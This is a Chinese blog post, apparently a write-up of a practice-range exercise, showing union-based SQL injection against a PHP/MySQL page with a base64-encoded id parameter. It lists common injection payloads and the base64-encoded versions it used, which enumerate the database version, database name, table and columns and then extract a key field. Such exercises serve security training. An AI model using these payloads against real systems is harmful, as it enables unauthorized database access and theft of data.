SQL注入实战-MySQL

作者: 乖巧小墨宝 | 来源:发表于2018-04-15 23:16 被阅读80次

    靶场地址:https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe

    进入靶场详情页,点击启动靶场,根据系统提供的信息进入靶场环境。

    Php注入mysql查询语句,由地址中的“?id=MQo=”可以看出,此处传递时用了base64编码,base64解码“id=MQo=”为1,常用mysql注入语句:

    这里仅列出常用的信息注入语句:

    暴出字段数 order by x

    利用内置函数暴出用户名 and 1=2 union select 1,user()

    利用内置函数暴出数据库版本 and 1=2 union select 1,version()

    利用内置函数暴出数据库名称and 1=2 union select 1,database()暴出表名:and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

    暴出字段名:and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x64617461(必须是表名的十六进制表示)

    暴出字段内容:and 1=2 union select 1,字段名 from 表名。

    由上述常用暴库语句可以做出此题目,首先爆出数据库版本、数据库名称的基本名称。

    “1 and 1=2 union select 1,version();”经过base64编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHZlcnNpb24oKTs=”,数据库版本为5.5.46-0ubuntu0.14.04.2:

    “1 and 1=2 union select 1,database();”经过编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGRhdGFiYXNlKCk7”,数据库名称为test:

    “1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database();“经过base64编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpOw==”,数据库表名为data:

    “1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x64617461;” 经过base64编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPTB4NjQ2MTc0NjE7”,表内字段为id,title,main,thekey:

    “1 and 1=2 union select 1,thekey from data;”经过编码得到“MSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHRoZWtleSBmcm9tIGRhdGE7”,得到KEY值。

    相关文章

      网友评论

        本文标题:SQL注入实战-MySQL

        本文链接:https://www.haomeiwen.com/subject/konjkftx.html